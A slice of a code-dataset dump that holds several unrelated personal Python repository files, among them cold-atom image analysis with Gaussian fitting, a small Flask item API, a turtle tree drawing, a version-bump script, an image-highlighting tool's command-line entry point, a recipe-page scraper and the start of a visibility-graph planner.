\r\n Parameters\r\n ----------\r\n params : ExperimentParams object\r\n \r\n counts : array or number\r\n Camera counts from fluorescence image\r\n \r\n Returns\r\n -------\r\n Atom number (per pixel) array in same shape as input counts array\r\n\r\n \"\"\"\r\n return (4*np.pi*counts*params.camera.sensitivity)/(params.camera.quantum_eff*params.R_scat*params.t_exp*params.solid_angle)\r\n \r\n\r\ndef ShowImages3d(images):\r\n \"\"\"\r\n Draws a grid of images\r\n\r\n Parameters\r\n ----------\r\n images : 3d Array\r\n\r\n \"\"\"\r\n iterations, height, width = np.shape(images)\r\n #print(iterations,picturesPerIteration)\r\n #imax = np.max(images)\r\n #imin = np.min(images)\r\n \r\n for it in range(iterations):\r\n print(it)\r\n ax = plt.subplot(iterations,1,1)\r\n ax.imshow(images[it,:,:],cmap=\"gray\")#,vmin = imin, vmax=imax)\r\n plt.tight_layout()\r\n plt.show()\r\n\r\ndef ShowImages(images):\r\n \"\"\"\r\n Draws a grid of images\r\n\r\n Parameters\r\n ----------\r\n images : 4d Array\r\n\r\n \"\"\"\r\n iterations, picturesPerIteration, height, width = np.shape(images)\r\n #print(iterations,picturesPerIteration)\r\n #imax = np.max(images)\r\n #imin = np.min(images)\r\n \r\n for it in range(iterations):\r\n for pic in range(picturesPerIteration):\r\n ax = plt.subplot(iterations, picturesPerIteration, it*picturesPerIteration + pic+1)\r\n ax.imshow(images[it,pic,:,:],cmap=\"gray\")#,vmin = imin, vmax=imax)\r\n plt.tight_layout()\r\n plt.show()\r\n \r\ndef ShowImagesTranspose(images, autoscale=True):\r\n \"\"\"\r\n Draws a grid of images\r\n\r\n Parameters\r\n ----------\r\n images : 4d Array\r\n \r\n autoscale: boolean\r\n True: scale each image independently\r\n\r\n \"\"\"\r\n iterations, picturesPerIteration, height, width = np.shape(images)\r\n \r\n #print(iterations,picturesPerIteration)\r\n \r\n if not autoscale:\r\n imax = np.max(images)\r\n imin = np.min(images)\r\n \r\n for it in range(iterations):\r\n for pic in range(picturesPerIteration):\r\n print(it,pic)\r\n ax = plt.subplot(picturesPerIteration, iterations, pic*iterations + it+1)\r\n if autoscale:\r\n ax.imshow(images[it,pic,:,:],cmap=\"gray\")#,vmin = imin, vmax=imax)\r\n else:\r\n ax.imshow(images[it,pic,:,:],cmap=\"gray\",vmin = imin, vmax=imax)\r\n plt.tight_layout()\r\n plt.show()\r\n \r\n \r\n\r\n# simple, no analysis, list of pics => normalized\r\ndef ImageTotals(images):\r\n \"\"\"\r\n \r\n ----------\r\n images : 4D array of images\r\n \r\n Returns\r\n -------\r\n 2D Array of sums over the images\r\n\r\n \"\"\"\r\n \r\n shape1 = np.shape(images)\r\n assert len(shape1) == 4, \"input array must be 4D\"\r\n \r\n shape2 = shape1[:-2]\r\n totals = np.zeros(shape2)\r\n \r\n for i in range(shape2[0]):\r\n for j in range(shape2[1]):\r\n totals[i,j] = np.sum(images[i,j,:,:])\r\n return totals\r\n \r\ndef temp(images): \r\n atoms_x = np.zeros((params.number_of_pics, params.width))\r\n atoms_y = np.zeros((params.number_of_pics, params.height)) \r\n \r\n #Sum the columns of the region of interest to get a line trace of atoms as a function of x position\r\n for i in range(params.number_of_iterations):\r\n for j in range(params.picturesPerIteration) :\r\n im_temp = images[i, j, params.ymin:params.ymax, params.xmin:params.xmax]\r\n count_x = np.sum(im_temp,axis = 0) #sum over y direction/columns \r\n count_y = np.sum(im_temp,axis = 1) #sum over x direction/rows\r\n atoms_x[i] = (4*np.pi*count_x*params.sensitivity)/(params.quantum_eff*params.R_scat*params.t_exp*params.solid_angle)\r\n atoms_y[i] = (4*np.pi*count_y*params.sensitivity)/(params.quantum_eff*params.R_scat*params.t_exp*params.solid_angle)\r\n print(\"num_atoms_vs_x in frame\" , i, \"is: {:e}\".format(np.sum(atoms_x[i])))\r\n print(\"num_atoms_vs_y in frame\" , i, \"is: {:e}\".format(np.sum(atoms_y[i])))\r\n \r\n if atoms_x != atoms_y:\r\n print(\"atom count calculated along x and along y do NOT match\")\r\n\r\n atoms_x_max = max(atoms_x)\r\n atoms_y_max = max(atoms_y)\r\n atoms_max = max(atoms_x_max, atoms_y_max) \r\n \r\n return atoms_x, atoms_y, atoms_max \r\n # output_array = np.array((number_of_iteration, outputPicsPerIteration, height, width)\r\n\r\n\r\ndef absImaging(images):\r\n iterations, picturesPerIteration, height, width = np.shape(images)\r\n \r\n signal = np.zeros((iterations, 1, height, width))\r\n \r\n if picturesPerIteration==4:\r\n for i in range(iterations-1):\r\n # signal is column density along the imaging path\r\n signal[i,0,:,:] = (images[i,1,:,:] - images[i,3,:,:]) / (images[i,2,:,:] - images[i,3,:,:])\r\n else:\r\n print(\"This spooled series does not have the correct number of exposures per iteration for Absorption Imaging\") \r\n \r\n return signal\r\n\r\n\r\ndef Gaussian(x, a, mu, w0, c):\r\n return a*np.exp(-(x-mu)**2/(2*w0**2)) + c\r\n\r\n\r\n#Gaussian_fit takes an array of the summed atom numbers. It outputs a gaussian width, a full fit report, and an x axis array\r\ndef Gaussian_fit(images, params, slice_array, tof, units_of_tof, dataFolder='.'):\r\n xposition = params.pixel_size*np.linspace(0, len(slice_array),len(slice_array))\r\n aguess = np.max(slice_array)\r\n muguess = params.pixel_size*np.where(slice_array == np.max(slice_array))[0][0]\r\n w0guess = params.pixel_size*len(slice_array)/4 #the standard dev. of the Gaussian\r\n cguess = np.min(slice_array)\r\n paramstemp = Parameters()\r\n paramstemp.add_many(\r\n ('a', aguess,True, None, None, None),\r\n ('mu', muguess, True, None, None, None),\r\n ('w0', w0guess, True, None, None, None),\r\n ('c', cguess, True, None, None, None),\r\n )\r\n \r\n model = lmfit.Model(Gaussian)\r\n result = model.fit(slice_array, x=xposition, params = paramstemp)\r\n gwidth = abs(result.params['w0'].value)\r\n return gwidth, result, xposition\r\n\r\n\r\n#Here I call the Gaussian_fit function on all of the expanding cloud pictures to output widths for all of them.\r\n half_of_pictures = int(params.number_of_pics/2)\r\n gaussian_widths_x = np.zeros(half_of_pictures)\r\n gaussian_widths_y = np.zeros(half_of_pictures)\r\n num_atoms_vs_x, num_atoms_vs_y, atoms_max = temp(slice_array)\r\n \r\n for i in range(half_of_pictures):\r\n fittemp_x = Gaussian_fit(num_atoms_vs_x[2*i+1,:])\r\n fittemp_y = Gaussian_fit(num_atoms_vs_y[2*i+1,:])\r\n gaussian_widths_x[i] = fittemp_x[0]\r\n gaussian_widths_y[i] = fittemp_y[0]\r\n \r\n \r\n if params.ready_to_save == 'true':\r\n \r\n #save Gaussian fit in x direction plot\r\n fit0_x = Gaussian_fit(num_atoms_vs_x[2*i+1,:])\r\n plt.figure()\r\n plt.rcParams.update({'font.size':9})\r\n plt.title('TOF = {}'.format(tof[i])+units_of_tof+' horizontal plot, standard dev. = {}m'.format(round(abs(fit0_x[0]), 5)))\r\n plt.xlabel(\"Position (m)\")\r\n plt.ylabel(\"Number of atoms in MOT\")\r\n plt.plot(fit0_x[2], num_atoms_vs_x[2*i+1,:], 'g.', label='Signal')\r\n plt.plot(fit0_x[2], fit0_x[1].best_fit, 'b', label='Fit')\r\n plt.legend()\r\n plt.tight_layout()\r\n plt.savefig(dataFolder +r'\\TOF = {}'.format(tof[i])+units_of_tof+' horizontal plot.png', dpi = 300)\r\n plt.close() \r\n \r\n #save Gaussian fit in y direction plot\r\n fit0_y = Gaussian_fit(num_atoms_vs_y[2*i+1,:])\r\n plt.figure()\r\n plt.title('TOF = {}'.format(tof[i])+units_of_tof+' vertical plot, standard dev. = {}m'.format(round(abs(fit0_y[0]), 5)))\r\n plt.xlabel(\"Position (m)\")\r\n plt.ylabel(\"Number of atoms in MOT\")\r\n plt.plot(fit0_y[2], num_atoms_vs_y[2*i+1,:], 'g.', label='Signal')\r\n plt.plot(fit0_y[2], fit0_y[1].best_fit, 'b', label='Fit')\r\n plt.legend()\r\n plt.tight_layout()\r\n plt.savefig(dataFolder+r'\\TOF = {}'.format(tof[i])+units_of_tof+' vertical plot.png', dpi = 300)\r\n plt.close()\r\n \r\n #save the picture from Andor\r\n plt.figure()\r\n plt.title(\"Signal inside red rectangle\")\r\n plt.imshow(images[2*i+1,params.ymin:params.ymax,params.xmin:params.xmax],cmap=\"gray\", origin=\"lower\",interpolation=\"nearest\",vmin=np.min(images),vmax=np.max(images))\r\n plt.savefig(dataFolder+r'\\TOF = {}'.format(tof[i])+units_of_tof+' signal inside red rectangle.png', dpi = 300)\r\n plt.close()\r\n \r\n\r\n gaussian_widths_x = np.flip(gaussian_widths_x)\r\n gaussian_widths_y = np.flip(gaussian_widths_y)\r\n\r\n\r\n#Here we import the relevant TOF file and combine it with the gaussian widths\r\n widths_tof_x = np.zeros((len(gaussian_widths_x),2))\r\n widths_tof_y = np.zeros((len(gaussian_widths_y),2))\r\n\r\n for i in range(len(gaussian_widths_x)):\r\n widths_tof_x[i] = (gaussian_widths_x[i], tof[i])\r\n widths_tof_y[i] = (gaussian_widths_y[i], tof[i])\r\n\r\n# save the data in a csv file\r\n if params.ready_to_save =='true':\r\n csvfilename_x = dataFolder+r\"\\widths_vs_tof_x.csv\"\r\n csvfilename_y = dataFolder+r\"\\widths_vs_tof_y.csv\"\r\n np.savetxt(csvfilename_x, widths_tof_x, delimiter = \",\") \r\n np.savetxt(csvfilename_y, widths_tof_y, delimiter = \",\") \r\n\r\n\r\ndef find_nearest(array, value):\r\n array = np.asarray(array)\r\n idx = (np.abs(array - value)).argmin()\r\n return array[idx]\r\n\r\ndef exponential(x, m, t, b):\r\n return m * np.exp(-t * x) + b\r\n \r\n# def fit_decay():\r\n \r\n #fit parameters\r\n # value = atom_max*np.exp(-1)\r\n # emin1 = find_nearest(array, value)\r\n # finder = np.where(N_atoms == emin1)\r\n# array_number = int(finder[0])\r\n# #print(\"array_number: \", array_number)\r\n# #######################################This is the time for the function to reach e**-1 of max value\r\n# emin1_time = Picture_Time[array_number]\r\n# atom_fraction = N_atoms/max(N_atoms)\r\n \r\n \r\n \r\n# p0 = (count_spooled.atom_max, 1/emin1_time, 0) # start with values near those we expect\r\n# params, cv = scipy.optimize.curve_fit(exp, Picture_Time, N_atoms, p0)\r\n# m, t, b = params\r\n \r\n# #Quality of fit\r\n# squaredDiffs = np.square(N_atoms - exp(Picture_Time, m, t, b))\r\n# squaredDiffsFromMean = np.square(N_atoms - np.mean(N_atoms))\r\n# rSquared = 1 - np.sum(squaredDiffs) / np.sum(squaredDiffsFromMean)\r\n# print(f\"R² = {rSquared}\")\r\n# print(f\"Y = {m} * e^(-{t} * x) + {b}\")\r\n \r\n# # plot the results\r\n# plt.plot(Picture_Time, N_atoms, '.', label=\"data\")\r\n# plt.plot(Picture_Time, exp(Picture_Time, m, t, b), '--', label=\"fitted\")\r\n# plt.title(\"Fitted Exponential Curve\", fontsize = 18)\r\n# if m < 10**5:\r\n# pressure = t/(6.4*10**7)\r\n# print(\"It appears that this decay occurs in the low density limit.\")\r\n# print(\"Based off of this assumption, the background pressure of the vacuum chamber appears to be {pressure} torr.\")\r\n \r\n \r\n# def fit_load():\r\n# p0 = (atom_max, (1-math.log(math.e-1))/emin1_time, atom_max) # start with values near those we expect\r\n# params, cv = scipy.optimize.curve_fit(exp, Picture_Time, N_atoms, p0)\r\n# m, t, b = params\r\n \r\n# #Quality of fit\r\n# squaredDiffs = np.square(N_atoms - exponential(Picture_Time, m, t, b))\r\n# squaredDiffsFromMean = np.square(N_atoms - np.mean(N_atoms))\r\n# rSquared = 1 - np.sum(squaredDiffs) / np.sum(squaredDiffsFromMean)\r\n# print(f\"R² = {rSquared}\")\r\n# print(f\"Y = {m} * e^(-{t} * x) + {b}\")\r\n# # plot the results\r\n# plt.plot(Picture_Time, N_atoms-min(N_atoms), '.', label=\"data\")\r\n# plt.plot(Picture_Time, Load_Decay(Picture_Time, m, t, b)-min(N_atoms), '--', label=\"fitted\")\r\n# plt.title(\"Atoms Loaded Over Time\", fontsize = 20) \r\n\r\nif __name__ == \"__main__\":\r\n #TESTING Script:\r\n\r\n config = LoadConfigFile()\r\n params = ExperimentParams(config, picturesPerIteration=1) \r\n\r\n # CountsToAtoms(params, images[3,4,:,:])\r\n\r\n images = loadSeriesPGM(params, root_filename=\"test\", number_of_pics=3, picturesPerIteration=1, n_params=0, data_folder= \".\") \r\n ShowImages(images) \r\n\r\n \r\n # print(\"Number of iterations=\",params.number_of_iterations)\r\n \r\n # images1 = LoadSpooledSeries(params, data_folder=\"abs img test 1_17\", background_file_name=\"\")\r\n # signal1 = absImaging(images1)\r\n # #atomsPerPixel = CountsToAtoms(params, counts)\r\n \r\n # #ShowImagesTranspose(atomsPerPixel)\r\n \r\n # print(np.shape(images1))\r\n # print(np.shape(signal1))\r\n \r\n # ShowImagesTranspose(images1, False)\r\n \r\n #atomNumbers = ImageTotals(atomsPerPixel)\r\n \r\n #print(atomNumbers)\r\n \r\n #number_of_pics = int(config['Acquisition']['NumberinKineticSeries'])\r\n #print(number_of_pics)\r\n \r\n # images = LoadSpooledSeries(config, data_folder= \".\" , background_file_name= \"spool_background.dat\", picturesPerIteration=3)\r\n # #images = LoadNonSpooledSeries(...)\r\n \r\n # atoms_per_pixel_images = GetCountsFromRawData(images,config)\r\n \r\n # #analyse it somehow:\r\n # #Find the total number of atoms at the end of each iteration\r\n # atom_numbers = GetTotalNumberofAtoms(atoms_per_pixel_images)\r\n \r\n # print(\"Number of atoms in 2nd picture of iteration 0:\",atom_numbers[0][1])\r\n \r\n # #Do a fit:\r\n # result = DoExponentialFit(atom_numbers[:][1])\r\n \r\n # print(np.shape(images))\r\n \r\n \r\n \r\n \r\n\r\n# #here I am making a plot of the first gaussian with the fit for reference\r\n# fit0_x = Gaussian_fit(num_atoms_vs_x[PreviewIndex,:])\r\n# plt.figure()\r\n# plt.rcParams.update({'font.size':9})\r\n# plt.title('Atoms TOF horizontal example plot, standard dev. = {}m'.format(round(fit0_x[0], 5)))\r\n# plt.xlabel(\"Position (m)\")\r\n# plt.ylabel(\"Number of atoms in MOT\")\r\n# plt.plot(fit0_x[2], num_atoms_vs_x[PreviewIndex,:], 'g.', label='Signal')\r\n# plt.plot(fit0_x[2], fit0_x[1].best_fit, 'b', label='Fit')\r\n# # plt.xlim(fit0_x[2][0], fit0_x[2][-1])\r\n# plt.legend()\r\n# plt.tight_layout()\r\n# # plt.savefig(folder_name+r\"\\Horizontal Gaussian Example.png\", dpi = 300)\r\n\r\n# fit0_y = Gaussian_fit(num_atoms_vs_y[PreviewIndex,:])\r\n# plt.figure()\r\n# plt.title('Atoms TOF vertical example plot, standard dev. = {}m'.format(round(fit0_y[0], 5)))\r\n# plt.xlabel(\"Position (m)\")\r\n# plt.ylabel(\"Number of atoms in MOT\")\r\n# plt.plot(fit0_y[2], num_atoms_vs_y[PreviewIndex,:], 'g.', label='Signal')\r\n# plt.plot(fit0_y[2], fit0_y[1].best_fit, 'b', label='Fit')\r\n# # plt.xlim(fit0_y[2][0], fit0_y[2][-1])\r\n# plt.legend()\r\n# plt.tight_layout()\r\n# plt.show()\r\n# # plt.savefig(folder_name+r\"\\Vertical Gaussian Example.png\", dpi = 300)\r\n \r\n","repo_name":"insommer/ImageAnalysis","sub_path":"ImageAnalysisCode.py","file_name":"ImageAnalysisCode.py","file_ext":"py","file_size_in_byte":30841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18896762009","text":"from flask import Flask, request\nfrom flask_restful import Resource, Api, reqparse\nfrom flask_jwt import JWT, jwt_required\n\n\napp = Flask(__name__)\napi = Api(app)\n\nitems = []\n\nclass Item(Resource):\n #HTTP Request parser\n parser = reqparse.RequestParser()\n parser.add_argument(\"price\",\n type = float,\n required = True,\n help=\"Please provide price information\"\n )\n #GET /item/\n def get(self, name):\n #Filter the item list with given name, return None if it is not found.\n item = next(filter(lambda x: x[\"name\"] == name, items), None)\n\n #Return the item with code 200 if item exist. Else return 404\n return {\"Item\": item}, 200 if item else 404\n\n #POST /item/\n def post(self, name):\n #Filtering the list to raise error if item already exist.\n #if filter not returns None execute the if block. Same thing as filter.... is not none.\n if next(filter(lambda x: x[\"name\"] == name, items), None):\n return {\"message\": \"An item with name '{}' already exist.\".format(name)},400\n\n data = Item.parser.parse_args()\n item = {\"name\":name, \"price\": data[\"price\"]}\n items.append(item)\n return item, 201\n\n #DELETE /item/\n def delete(self, name):\n global items\n items = list(filter(lambda x: x[\"name\"] != name,items))\n return {\"message\": \"item deleted\"}\n\n #PUT /item/\n #Updates price of an item\n def put(self,name):\n data = Item.parser.parse_args()\n item = next(filter(lambda x: x[\"name\"] == name,items),None)\n if item is None:\n item = {\"name\":name, \"price\": data[\"price\"]}\n items.append(item)\n else:\n item.update(data)\n return item\nclass ItemList(Resource):\n #GET /items\n def get(self):\n return {\"items\": items}\n\napi.add_resource(Item, \"/item/\")\napi.add_resource(ItemList, \"/items\")\napp.run(port=5000, debug=True)\n","repo_name":"MutluhanB/ShopAPI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20696019687","text":"from turtle import *\n\n\ndef tree(plist, l, a, f):\n \"\"\"plist is a list of pens\n l is length of the branch\n a is a half of the angle between 2 branches\n f is factor by which branch is shortened\n \"\"\"\n if l > 5:\n lst = []\n for p in plist:\n p.forward(1)\n q = p.clone()\n p.left(a)\n q.right(a)\n lst.append(p)\n lst.append(q)\n tree(lst, l * f, a, f)\n\n\ndef main():\n t = Turtle()\n t.color(\"green\")\n t.pensize(15)\n t.hideturtle()\n # FINISHED INITIALIZING\n t.getscreen().tracer(30, 0)\n t.left(90)\n t.penup()\n t.goto(60, 60)\n t.pendown()\n p = tree([t], 110, 65, 0.6375)\n\n\nmain()\n","repo_name":"XuhuaHuang/LearnPython","sub_path":"Demonstration/draw_tree.py","file_name":"draw_tree.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7159439343","text":"import argparse, xml.etree.ElementTree as ET\n\ndef __bump(filename, old, new, preserve=None):\n lines = []\n with open(filename, 'r') as f:\n for line in f:\n if preserve and not preserve(line.rstrip()):\n line = line.replace(old, new)\n lines.append(line)\n with open(filename, 'w') as f:\n for line in lines:\n f.write(line)\n\ndef __bump_xhtml(filename, old, new):\n __bump(filename, old, new, preserve=lambda s: s.endswith(''))\n\ndef __bump_yaml(filename, old, new):\n __bump(filename, old, new, preserve=lambda s: s.endswith('# hold-version'))\n\ndef pom(old, new):\n __bump_xhtml('pom.xml', old, new)\n\ndef readme(old, new):\n __bump_xhtml('README.md', old, new)\n\ndef docker_compose(old, new):\n __bump_yaml('docker-compose.yml', old, new)\n __bump_yaml('docker-compose.cluster.yml', old, new)\n\ndef helm(old, new):\n __bump_yaml('chart/Chart.yaml', old, new)\n __bump_xhtml('chart/README.md', old, new)\n\nparser = argparse.ArgumentParser(description='Version bumper')\n\npom_tree = ET.parse('pom.xml')\npom_version = pom_tree.find('{http://maven.apache.org/POM/4.0.0}version').text\n\nparser.add_argument('--old', help='Old version. Defaults to parse from pom.xml version field', default=pom_version)\nparser.add_argument('--new', help='New Version')\nargs = parser.parse_args()\n\nif not args.new:\n raise ValueError('missing new version argument')\n\nfor f in [pom, readme, docker_compose, helm]:\n f(args.old, args.new)\n","repo_name":"OneCricketeer/apache-kafka-connect-docker","sub_path":"version-bump.py","file_name":"version-bump.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"74565578114","text":"import argparse\nimport logging\nimport logging.config\nimport os\n\nfrom . import rectangle\nfrom . import extender\nfrom . import print_screen\nfrom . import app_core\n\ndef main():\n ac = app_core.AppCore()\n\n # ihl ext -i img.jpg -o example.jpg -t TEXT -a center -s 50\n\n parser = argparse.ArgumentParser(\n description=f\"Image High Lighter\\n\\n{ac.read_extended_help()}\",\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n subparsers = parser.add_subparsers()\n\n rect_parser = subparsers.add_parser('rect', help=\"\"\"\n LMB - draw rectangle\n MMB - crop\n RMB - add text\n \n LMB Double click - add number\n \n TAB - change color\n \n CTRL + 7 - add number to left top rectangle corner\n CTRL + 9 - add number to right top rectangle corner\n CTRL + 1 - add number to left bottom rectangle corner\n CTRL + 3 - add number to right bottom rectangle corner\n \n CTRL + 8 - add note above the rectangle\n CTRL + 2 - add note below the rectangle\n \n CTRL + Plus - increase size of rectangle border line\n CTRL + Minus - decrease size of rectangle border line\n \n ALT + Plus - increase alpha of rectangle background color\n ALT + Minus - - decrease alpha of rectangle background color\n \n SHIFT + Plus - increase font size\n SHIFT + Minus - decrease font size\n \n P - increase the number counter\n M - decrease the number counter\n \n ALT + I - increase alpha background color of number rectangle\n ALT + D - decrease alpha background color of number rectangle\n \n CTRL + O - open new instance of application with selected image\n CTRL + C - copy current image\n CTRL + Z - undo\n \n ESC - close the application\n \"\"\")\n rect_parser.set_defaults(func=rectangle.run)\n rect_parser.add_argument(\"-p\", \"--path\", required=True)\n rect_parser.add_argument(\"-z\", \"--minimize\", action='store_true')\n rect_parser.add_argument(\"-f\", \"--frameless\", action='store_true')\n\n print_screen_parser = subparsers.add_parser('ps')\n print_screen_parser.set_defaults(func=print_screen.run)\n print_screen_parser.add_argument(\"-o\", \"--output\", default=\"./print_screens/%Y.%m.%d_%H-%M-%S.png\")\n print_screen_parser.add_argument(\"-b\", \"--backup\", default=os.path.join(ac.app_directory(), r\"backup/full/%Y.%m.%d/%Y.%m.%d_%H-%M-%S.png\"))\n print_screen_parser.add_argument(\"--backup_directory\", default=os.path.join(ac.app_directory(), r\"backup/original/%Y.%m.%d/\"))\n print_screen_parser.add_argument(\"-r\", \"--rect\", action='store_true')\n print_screen_parser.add_argument(\"-z\", \"--rect_minimize\", action='store_true')\n print_screen_parser.add_argument(\"-f\", \"--rect_frameless\", action='store_true')\n print_screen_parser.add_argument(\"-m\", \"--monitor\", default=2)\n print_screen_parser.add_argument(\"-v\", \"--variables\", default=[], nargs='*')\n\n extender_parser = subparsers.add_parser('ext')\n extender_parser.set_defaults(func=extender.run)\n extender_parser.add_argument(\"-i\", \"--image_path\")\n extender_parser.add_argument(\"-o\", \"--output_path\", default=None, help=\"If it is not set. The original image will overwrite.\")\n extender_parser.add_argument(\"-p\", \"--position\", default=\"head\", help=\"foot, head\")\n extender_parser.add_argument(\"-t\", \"--text\", required=True)\n extender_parser.add_argument(\"-a\", \"--text_align\", default=\"center\", help=\"left, center, right\")\n extender_parser.add_argument(\"-c\", \"--text_color\", default=\"#FFFFFF\", help=\"#FFFFFF, FFFFFF\")\n extender_parser.add_argument(\"-b\", \"--background_color\", default=\"#000000\", help=\"#000000\")\n extender_parser.add_argument(\"-f\", \"--font_path\", default=\"FONTS/arial.ttf\", help=\"FONTS/arial.ttf\")\n extender_parser.add_argument(\"-s\", \"--font_size\", default=34, help=\"34\")\n extender_parser.add_argument(\"-v\", \"--vertical_padding\", default=10, help=\"10\")\n extender_parser.add_argument(\"-n\", \"--horizontal_padding\", default=10, help=\"10\")\n\n batch_rect_parser = subparsers.add_parser('bect')\n batch_rect_parser.set_defaults(func=rectangle.run_for_all)\n batch_rect_parser.add_argument(\"-z\", \"--rect_minimize\", action='store_true')\n\n font_test_parser = subparsers.add_parser('font-test')\n font_test_parser.set_defaults(func=extender.run_font_test)\n font_test_parser.add_argument(\"-i\", \"--image_path\")\n font_test_parser.add_argument(\"-d\", \"--fonts_directory\")\n\n arguments = parser.parse_args()\n arguments.func(arguments)\n\n# TODO: Rectangle - CTRL + O\n\n# TODO: Rectangle - Nastaveni tloustky cary\n# TODO: Rectangle - Nastaveni alpha pro vypln ctverce\n# TODO: Rectangle - Nastaveni fontu a velikosti\n# TODO: Rectangle - Hezci okno pro text nebo nazornejsi pridavani textu\n# TODO: Rectangle - Funkce prohlizece v adresari sipky\n# TODO: Rectangle - Pridani a odstraneni head / foot\n# TODO: Rectangle - Frameless ui.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n# TODO: Rectangle - Nastrojova a stavova lista\n# TODO: Rectangle - Crop mimo aktualni view\n# TODO: Rectangle - Hezci scrollbary\n# TODO: Rectangle - Hezci background color\n# TODO: Rectangle - Vyrezat vlozit\n# TODO: Rectangle - Vlozit CTRL + V posunout\n\n# TODO: Cislo v kruhu (ALT + double click LMB)\n# TODO: Vkladani popisu k cislum do paticky obrazku (jeden radek == jeden popis NEBO napocitat kolik se toho vejde na radek)\n\n# TODO: NEJDULEZITESJSI JE REFAKTOR A PRIDANI STAVOVE LISTY\n\n# TODO: Aplikace co posloucha Print Screen key press event\n\n# TODO: extender - pridani podle konfigu [] + variables\n# TODO: extender - hromadne zpracovani podle konfigu, na jednom radku left, center, right\n# TODO: extender - gradient\n# TODO: extender - propracovanejsi extended area\n\n# TODO: Idea backup machine - vytvori zip a ulozi na standardni misto\n\n# https://stackoverflow.com/questions/34697559/pil-image-to-qpixmap-conversion-issue\n# from PIL.ImageQt import ImageQt\n# qim = ImageQt(im)\n# pix = QtGui.QPixmap.fromImage(qim)\n","repo_name":"ShadowCodeCz/ImageHighLighter","sub_path":"ihl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9799407906","text":"import re\nfrom api import cache\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nregex_unit = re.compile('data-quantity-unit-singular=\"(.*?)\"')\nregex_quantity = re.compile('data-quantity=\"(\\d+)\"')\nregex_additional = re.compile('data-additional-info=\"(.*?)\"')\nregex_ingredient = re.compile('data-description-singular=\"(.*?)\"')\nregex_recipe_item_list = re.compile('
    (.*?)
', re.DOTALL)\nregex_recipe_item = re.compile('
  • (.*?)
  • ', re.DOTALL)\nregex_preparation_time = re.compile('
    (\\d+).*?', re.DOTALL)\nregex_name = re.compile('', re.DOTALL)\nregex_number_persons = re.compile('
    .*?(\\d+).*?', re.DOTALL)\nregex_recept_url = re.compile('/allerhande/recept/R-R(.*?)/', re.DOTALL)\n\n# data-phone-src=\"https://static.ah.nl/static/recepten/img_088124_890x594_JPG.jpg\"\nregex_picture = re.compile('data-phone-src=\"(.*?)\"', re.DOTALL)\n\n# def get_recipe_ids_from_page(ah_url):\n# response = requests.get(ah_url)\n# if response.status_code != 200:\n# return '', ''\n# matches = regex_recept_url.findall(response.text)\n# matches = list(set(matches))\n# ids = []\n# for match in matches:\n# ids.append('R-R' + match)\n# return ids\n\n\ndef get_recipe_page_html(recipe_id):\n url = 'https://www.ah.nl/allerhande/recept/' + recipe_id\n result = cache.query(url, params={}, headers={}, result_type=cache.ResultType.HTML)\n return result, url\n\n\ndef get_recipe(recipe_id):\n text, url = get_recipe_page_html(recipe_id)\n logger.info(text)\n recipe_items = get_recipe_items(text)\n logger.info(str(recipe_items))\n preparation_time_in_min = get_preparation_time_min(text)\n number_persons = get_number_persons(text)\n name = get_name(text)\n picture_url = get_picture(text)\n recipe = {\n 'name': name,\n 'url': url,\n 'picture_url': picture_url,\n 'recipe_items': recipe_items,\n 'preparation_time_in_min': preparation_time_in_min,\n 'number_persons': number_persons\n }\n return recipe\n\n\ndef get_name(page_html_text):\n matches = regex_name.findall(page_html_text)\n return matches[0]\n\n\ndef get_number_persons(page_html_text):\n matches = regex_number_persons.findall(page_html_text)\n return int(matches[0]) if matches else 1\n\n\ndef get_picture(page_html_text):\n matches = regex_picture.findall(page_html_text)\n return matches[0]\n\n\ndef get_recipe_items(page_html_text):\n matches = regex_recipe_item_list.findall(page_html_text)\n recipe_item_list = matches[0]\n matches = regex_recipe_item.findall(recipe_item_list)\n recipe_items = []\n for match in matches:\n name = ''\n unit = ''\n quantiy = 0\n\n matches = regex_quantity.findall(match)\n if matches:\n quantiy = int(matches[0])\n\n matches = regex_ingredient.findall(match)\n if matches:\n name = matches[0]\n\n matches = regex_unit.findall(match)\n if matches:\n unit = matches[0]\n\n matches = regex_additional.findall(match)\n unit_not_so_good = unit == 'pak' or unit == 'zakken' or unit == 'zak'\n if unit_not_so_good and matches:\n addit = matches[0].split(' ')\n if len(addit) == 2:\n quantiy = int(addit[0])\n unit = addit[1]\n elif len(addit) == 3 and addit[0] == 'a':\n quantiy = int(addit[1])\n unit = addit[2]\n\n recipe_items.append([quantiy, unit, name])\n return recipe_items\n\n\ndef get_preparation_time_min(page_html_text):\n matches = regex_preparation_time.findall(page_html_text)\n try:\n prep_time = int(matches[0])\n except ValueError:\n prep_time = None\n return prep_time\n","repo_name":"mathijsromans/consupedia","sub_path":"api/allerhande_scraper.py","file_name":"allerhande_scraper.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6035955339","text":"from Robot import *\nfrom Map import *\nfrom Obstacle import *\nfrom Node import *\n\nclass VisibilityGraph():\n\n def __init__(self, window, start, goal, obstacles, robot):\n self.Map = Map(obstacles, robot)\n self.window = window\n self.segments = []\n self.nodes ={}\n self.new_nodes = {}\n self.start = Node(window, start, 0)\n self.goal = Node(window, goal, 0)\n for h in xrange(1):\n self.nodes[h] = self.getNodes(h)\n\n for a in xrange(1):\n nodes = self.nodes[a]\n for i in xrange(len(nodes)):\n node1 = nodes[i]\n for j in xrange(len(nodes)):\n node2 = nodes[j]\n if not node1.state[0].equal(node2.state[0]):\n s = Segment(self.window, node1.state[0].copy(), node2.state[0].copy())\n if self.Map.isSegLegal(s, a):\n self.segments.append(s)\n node1.addChild(node2)\n #s.draw(\"green\")\n #if can connect to different layer do connect\n '''\n for t in 